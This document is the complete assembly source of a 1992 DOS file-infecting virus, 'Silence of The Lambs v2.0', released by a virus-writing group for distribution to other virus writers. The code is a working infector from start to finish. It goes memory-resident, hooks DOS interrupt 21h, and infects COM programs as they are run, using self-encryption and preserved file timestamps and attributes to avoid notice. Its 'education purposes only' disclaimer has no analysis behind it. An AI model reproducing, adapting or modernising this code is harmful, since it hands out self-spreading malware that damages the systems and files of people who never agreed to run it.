;                            Silence of The Lambs v2.0
;                (c) -=<: DRE/\MER :>=- of Demoralized Youth 1992
;
;                   THIS FILE IS FOR EDUCATION PURPOSES ONLY!
;                  PERMISSION IS GRANTED TO SPREAD THE SOURCE
;                  TO VIRUS WRITERS *ONLY*. PLEASE DO NOT MAKE
;                  ANY MODIFYCATIONS, UNLESS YOU ALSO INCLUDE
;                             THE ORIGINAL SOURCE.
;
;                               Assemble With A86
;

org     100h
jmp short dummy1
db      'DY'
dummy1:
        mov     cx,length
        mov     si,offset enc_start
        mov     ah,0
enc_key         equ $-1
dummy2:
        sub     byte [si],ah
        inc     si
        add     ah,0
enc_add         equ $-1
        loop    dummy2
enc_start:
        mov     ah,2Dh
        mov     ch,0FFh
        mov     dx,cx
        int     21h
        cmp     al,0FFh
        jne     nomore

        mov     ax,cs
        dec     ax
        mov     ds,ax
        cmp     byte [0],'Z'
        jne     nomore

        mov     ax,word [3]
        sub     ax,pgfsize
        jc      nomore
        sub     word [3],pgfsize
        sub     word [12h],pgfsize

        mov     es,word [12h]
        mov     si,110h
        mov     di,100h
        mov     cx,total
        cld
        rep     movsb

        xor     ax,ax
        mov     ds,ax
        mov     si,84h
        mov     di,old21
        movsw
        movsw

        cli
        mov     word [84h+2],es
        mov     word [84h],offset ni21
        sti

nomore:
        push    cs
        push    cs
        pop     es
        pop     ds

        mov     bx,0000h                        ;return control to the
eof     equ $-2                                 ;end user
        jmp     bx

xclose:         jmp     close

infect:
        push    cs
        pop     ds
        push    cs
        pop     es

        db      0E4h,40h
        mov     byte [enc_key],al

        mov     ax,4300h                        ;use CHMOD to get file attr
        xor     dx,dx
        int     21h

        mov     [0F0h],cx                       ;store attr in PSP

        mov     ax,4301h                        ;clear file attr with CHMOD
        xor     cx,cx
        int     21h

        mov     ax,3D02h                        ;open file for read / write
        int     21h
        xchg    bx,ax
        lahf
        push    ax
        mov     ax,5700h                        ;get file date & time
        int     21h

        mov     [0F2h],cx
        mov     [0F4h],dx
        pop     ax
        sahf
        jc      xclose

        mov     ah,3Fh                          ;read from file
        mov     cx,total
        mov     dx,old
        int     21h

        cmp     byte [old+0],'M'   ;exe MZ ?
        je      xclose
        cmp     byte [old+0],'Z'   ;exe ZM ?
        je      xclose
        cmp     word [old+2],'YD'   ;allready infected?
        je      xclose

        mov     ax,4202h                        ;lseek to EOF
        xor     cx,cx
        xor     dx,dx
        int     21h

        cmp     ah,0FAh
        jae     xclose
        cmp     ah,4
        jb      xclose

        add     ax,total+100h
        mov     word [00F6h],ax

        mov     ah,40h                          ;write to EOF
        mov     cx,total
        mov     dx,old

push    cx
mov     al,byte [enc_key]
mov     si,dx
enc_app:
xor     byte [si],al
inc     si
loop    enc_app
pop     cx

        int     21h

        mov     ah,40h                          ;write to EOF
        mov     cx,applen
        mov     dx,offset append
        int     21h

        mov     ax,4200h                        ;lseek to beginning of file
        xor     cx,cx
        xor     dx,dx
        int     21h

        push    [eof]
        mov     ax,word [00F6h]
        mov     [eof],ax

        mov     ah,byte [enc_key]
        db      0E4h,40h
        mov     byte [enc_add],al
        mov     dl,al

        mov     si,100h
        mov     di,old

        cld
        mov     cx,offset enc_start-100h
        rep     movsb

        mov     cx,length
enc:
        lodsb
        add     al,ah
        stosb
        add     ah,dl
        loop    enc

        mov     ah,40h                          ;write viral code
        mov     dx,old
        mov     cx,total
        int     21h

        pop     [eof]
close:
        mov     ax,5701h
        mov     cx,[00F2h]
        mov     dx,[00F4h]
        int     21h

        mov     ah,3Eh                          ;close file
        int     21h

        mov     ax,4301h
        mov     cx,[00F0h]
        xor     dx,dx
        int     21h
        ret

append:
        call    $+3             ;replace org bytes
        pop     si
        sub     si,3+total
        mov     di,100h
        mov     cx,total
        mov     ah,byte [enc_key]
append_enc:
        lodsb
        xor     al,ah
        stosb
        loop    append_enc

        mov     ax,100h         ;return IP to 100h when done
        push    ax

        sub     ax,ax           ;zero regs
        xor     bx,bx
        and     cx,cx
        sub     dx,dx
        xor     si,si
        and     di,di
        sub     bp,bp

        ret
applen  equ $-offset append

ni21:
        pushf
        cmp     ah,2Dh
        jne     Not_Time
        cmp     ch,0FFh
        jne     Not_Time
        cmp     ch,dh
        jne     Not_time

        mov     Al,0
        popf
        iret
Not_Time:
        cld
        push    ax
        push    bx
        push    cx
        push    dx
        push    si
        push    di
        push    bp
        push    es
        push    ds

;       cmp     ah,41h
;       jne     Not_Parse
;       mov     ah,3Ch
;       cli
;       add     sp,18
;       sti
;       popf
;       jmp     old21-1

Not_Parse:
        cmp     ax,4B00h
        jne     Not_Exec

        mov     si,dx
        push    cs
        pop     es
        xor     di,di
        mov     cx,128
        rep     movsb

        mov     ax,3524h
        int     21h
        push    es
        push    bx

        push    cs
        pop     ds

        mov     ax,2524h
        mov     dx,offset ni24
        int     21h

        call    infect

        pop     dx
        pop     ds
        mov     ax,2524h
        int     21h

Not_Exec:
        pop     ds
        pop     es
        pop     bp
        pop     di
        pop     si
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        popf
        jmp     far     0000:0000
old21   equ $-4

ni24:   mov al,0
        iret

db      'The Silence Of The Lambs!$'

total   equ $-100h                      ;size
pgfsize equ (($*2)/16)+2
length  equ $-offset enc_start

old     equ $